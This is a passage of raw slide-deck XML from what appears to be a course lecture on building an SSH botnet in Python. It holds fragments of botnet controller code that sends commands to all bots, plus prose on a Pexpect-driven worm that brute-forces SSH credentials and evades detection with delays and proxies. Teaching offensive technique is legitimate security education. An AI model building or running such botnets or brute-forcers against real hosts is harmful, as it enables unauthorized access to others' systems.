              <a:t>self</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ssh_client</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">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1fa8498ff28_0_24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="810500"/>
            <a:ext cx="103104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BUILDING AN SSH BOTNET WITH PYTHON CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;g1fa8498ff28_0_24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2045750"/>
            <a:ext cx="11477400" cy="4720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Exception</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Error Connecting'</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send_command</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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cmd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stdin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stdout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stderr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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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session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exec_command</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cmd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stdout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read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decode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botnetCommand</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command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client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botNet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output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client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send_command</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command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Output from '</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client</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.host)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output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800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ABB2BF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="282C34"/>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fa8498ff28_0_30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="810500"/>
            <a:ext cx="103104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BUILDING AN SSH BOTNET WITH PYTHON CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;g1fa8498ff28_0_30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2045750"/>
            <a:ext cx="11477400" cy="4720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addClient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client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Client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botNet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append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client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botNet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7F848E"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Example</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="7F848E"/>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7F848E"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Add/connect a client to the botNet list</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="7F848E"/>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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>addClient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'127.0.0.1'</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'root'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'mypassword'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7F848E"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Send a command to all bots</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="7F848E"/>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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>botnetCommand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'ls -la'</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e9a65c21fa_1_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;g1e9a65c21fa_1_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467551" y="2361425"/>
            <a:ext cx="11544000" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lets implement our own automated SSH Worm that brute forces user credentials against a target. Because SSH clients require user interaction, our script must be able to wait and match for an expected output before sending further input commands. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Consider the following scenario, order to connect to our SSH machine at IP Address, 127.0.0.1. the application first asks us to confirm the RSA key fingerprint. In this case, we must answer"yes" before continuing. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, the application asks us to enter a password: before graming us a command prompt. Finally, we execute our command unanie - to determine the kernel version running on our target.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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attacker$ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>root@127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="20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e9a65c21fa_1_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;g1e9a65c21fa_1_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439277" y="2804475"/>
            <a:ext cx="11572500" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes a process for creating an automated SSH worm that uses a brute-force attack to guess user credentials on a target. Because SSH clients require user interaction, the script must be able to wait and match for an expected output before sending further input commands.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The statement provides an example of a scenario where the attacker is trying to connect to an SSH machine at IP address 127.0.0.1. The SSH application first asks the attacker to confirm the RSA key fingerprint, in this case, the attacker must answer "yes" before continuing. Next, the application asks for a password, which the attacker must provide before being granted a command prompt. Finally, the attacker can execute a command, such as "uname -a" to determine the kernel version running on the target.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;g1e9a65c21fa_1_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867267" y="2071305"/>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e9a65c21fa_1_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Google Shape;417;g1e9a65c21fa_1_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467551" y="2361425"/>
            <a:ext cx="11317200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The script would be able to simulate the user interaction by sending the necessary inputs at the appropriate time and waiting for the expected output before continuing. The script would use a list of commonly used usernames and passwords and try them one by one until it finds the correct credentials and successfully connect to the target. </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The script would also include a feature to avoid detection such as using a delay between login attempts or using a proxy to hide the IP address. This kind of script could be used to perform malicious activities on the target machine, once it gains access to it.</a:t>
            </a:r>
            <a:endParaRPr sz="25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1e9a65c21fa_1_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;g1e9a65c21fa_1_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467551" y="2361425"/>
            <a:ext cx="11613900" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In order to automate this interactive console, we will make use of a third party Python module named Pexpect (available to download at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pexpect.sourceforge.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ).</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Pexpect has the ability to interact with programs, watch for expected outputs, and then respond based on expected outputs. This makes it an excellent tool of choice for autoning the process of brute forcing SSH</a:t>
            </a:r>
            <a:endParaRPr sz="20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1e9a65c21fa_1_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;g1e9a65c21fa_1_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401559" y="2876214"/>
            <a:ext cx="9613800" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In order to automate this interactive console, we will make use of a third-party Python module named Pexpect (available to download at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pexpect.sourceforge.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ).</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Pexpect has the ability to interact with programs, watch for expected outputs, and then respond based on expected outputs. This makes it an excellent tool of choice for autoning the process of brute forcing SSH</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;g1e9a65c21fa_1_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820133" y="2298364"/>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1e9a65c21fa_1_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;g1e9a65c21fa_1_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467546" y="2361423"/>
            <a:ext cx="9613800" cy="35994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000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes the use of a Python module called Pexpect for automating the process of brute-forcing SSH. Pexpect is a third-party module that can be used to interact with programs, watch for expected outputs, and respond based on those outputs. This makes it an ideal tool for automating the process of guessing user credentials on a target through SSH.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Pexpect is a python module which allows automation of control-character-based programs like ssh, ftp, passwd, telnet, etc. It uses the TTY (terminal) to interact with the program, it can simulate the keystrokes and respond to the program's prompts. It is useful in cases where the program requires an interactive session and the user interaction is required.</a:t>
            </a:r>
            <a:endParaRPr sz="20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1e9a65c21fa_1_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99271" y="8350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a:t>Interacting with SSH Through Pexpect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;g1e9a65c21fa_1_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467546" y="2361423"/>
            <a:ext cx="9613800" cy="35994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000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In this scenario, Pexpect will be used to automate the process of connecting to an SSH server, providing credentials, and interacting with the server. This way, the script can simulate a user by providing the expected inputs and responses at the correct time, making it an efficient tool for brute-forcing SSH. Pexpect can be downloaded from the website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
